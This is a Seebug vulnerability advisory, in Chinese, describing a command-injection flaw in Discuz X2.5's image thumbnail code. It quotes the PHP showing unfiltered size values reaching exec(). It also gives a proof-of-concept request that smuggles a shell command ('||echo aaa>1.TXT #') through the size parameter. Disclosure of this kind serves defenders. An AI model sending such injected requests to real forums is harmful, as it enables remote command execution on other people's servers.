Discuz X2.5 /source/class/class_image.php 命令执行漏洞

2015-01-23T00:00:00
ID SSV:89024
Type seebug
Reporter Root
Modified 2015-01-23T00:00:00

Description

<ul><li>/source/module/aforum/forum_image.php</li></ul>

``` $nocache = !empty($_GET['nocache']) ? : ;

$daid = intval($_GET['aid']);

$type = !empty($_GET['type']) ? $_GET['type'] : 'fixwr';

list($w, $h) = explode('x', $_GET['size']);

$dw = intval($w);

$dh = intval($h);

$thumbfile = 'image/'.$daid.'_'.$dw.'_'.$dh.'.jpg';

$parse = parse_url($_G['setting']['attachurl']);

$attachurl = !isset($parse['host']) ? $_G['siteurl'].$_G['setting']['attachurl'] : $_G['setting']['attachurl'];

if(!$nocache) {

    if(file_exists($_G['setting']['attachdir'].$thumbfile)) {

        dheader('location: '.$attachurl.$thumbfile);

    }

}



define('NOROBOT', TRUE);



$id = !empty($_GET['atid']) ? $_GET['atid'] : $daid;

if(dsign($id.'|'.$dw.'|'.$dh) != $_GET['key']) {

    dheader('location: '.$_G['siteurl'].'static/image/common/none.gif');

}



if($attach = C::t('forum_attachment_n')-&gt;fetch('aid:'.$daid, $daid, array(1, -1))) {

    if(!$dw &amp;&amp; !$dh &amp;&amp; $attach['tid'] != $id) {

           dheader('location: '.$_G['siteurl'].'static/image/common/none.gif');

    }

        dheader('Expires: '.gmdate('D, d M Y H:i:s', TIMESTAMP +   ).' GMT');

    if($attach['remote']) {

        $filename = $_G['setting']['ftp']['attachurl'].'forum/'.$attach['attachment'];

    } else {

        $filename = $_G['setting']['attachdir'].'forum/'.$attach['attachment'];

    }

    require_once libfile('class/image');

    $img = new image;

    if($img-&gt;Thumb($filename, $thumbfile, $w, $h, $type)) {

```

带入Thumb方法的变量是$w以及$h,而非过滤后的$dw和$dh。

  • /source/class/class_image.php

``` function Thumb($source, $target, $thumbwidth, $thumbheight, $thumbtype = 1, $nosuffix = 0) { $return = $this->init('thumb', $source, $target, $nosuffix); if($return <= 0) {

            return $this-&gt;returncode($return);

        }



        if($this-&gt;imginfo['animated']) {

            return $this-&gt;returncode(0);

        }

        $this-&gt;param['thumbwidth'] = $thumbwidth;

        if(!$thumbheight || $thumbheight &gt; $this-&gt;imginfo['height']) {

            $thumbheight = $thumbwidth &gt; $this-&gt;imginfo['width'] ? $this-&gt;imginfo['height'] : $this-&gt;imginfo['height

        }

        $this-&gt;param['thumbheight'] = $thumbheight;

        $this-&gt;param['thumbtype'] = $thumbtype;

        if($thumbwidth &lt; 100 &amp;&amp; $thumbheight &lt; 100) {

            $this-&gt;param['thumbquality'] = 100;

        }



        $return = !$this-&gt;libmethod ? $this-&gt;Thumb_GD() : $this-&gt;Thumb_IM();

```

传入的参数进入$this->param的时候依旧为过滤,进入Thumb_IM方法。

``` function Thumb_IM() {

        switch($this-&gt;param['thumbtype']) {

            case 'fixnone':

            case 1:

                if($this-&gt;imginfo['width'] &gt; $this-&gt;param['thumbwidth'] || $this-&gt;imginfo['height'] &gt; $this-&gt;param['

                    $exec_str = $this-&gt;param['imageimpath'].'/convert -quality '.intval($this-&gt;param['thumbquality']

                    $return = exec($exec_str);

                    if(!file_exists($this-&gt;target)) {

                        return -3;

                    }

                }

                break;

```

<p>参数带入exec函数执行,导致任意命令执行。<br></p><p>当用户传入:</p><pre class="">mod=image&aid=71&size=300x300||echo%20aaa>1.TXT%20%23&key=222dfc26b07dcd6a&nocache=yes&type=fixnone</pre><p>执行的命令为:</p><pre class="">/bin/convert -quality 100 -geometry 300x300||echo aaa>1.TXT # /var/www/html/discuzx2.5/upload/./data/attachment/forum/201501/16/143552dnewxwoxwsooezea.jpg /var/www/html/discuzx2.5/upload/./data/attachment/./image/71_300_300.jpg</pre><p>网站根目录:</p><p><img alt="67F3866B-4271-4B5C-A928-171494D73DFA.png" src="https://images.seebug.org/@/uploads/1433907619885-67F3866B-4271-4B5C-A928-171494D73DFA.png" data-image-size="490,125"><br></p>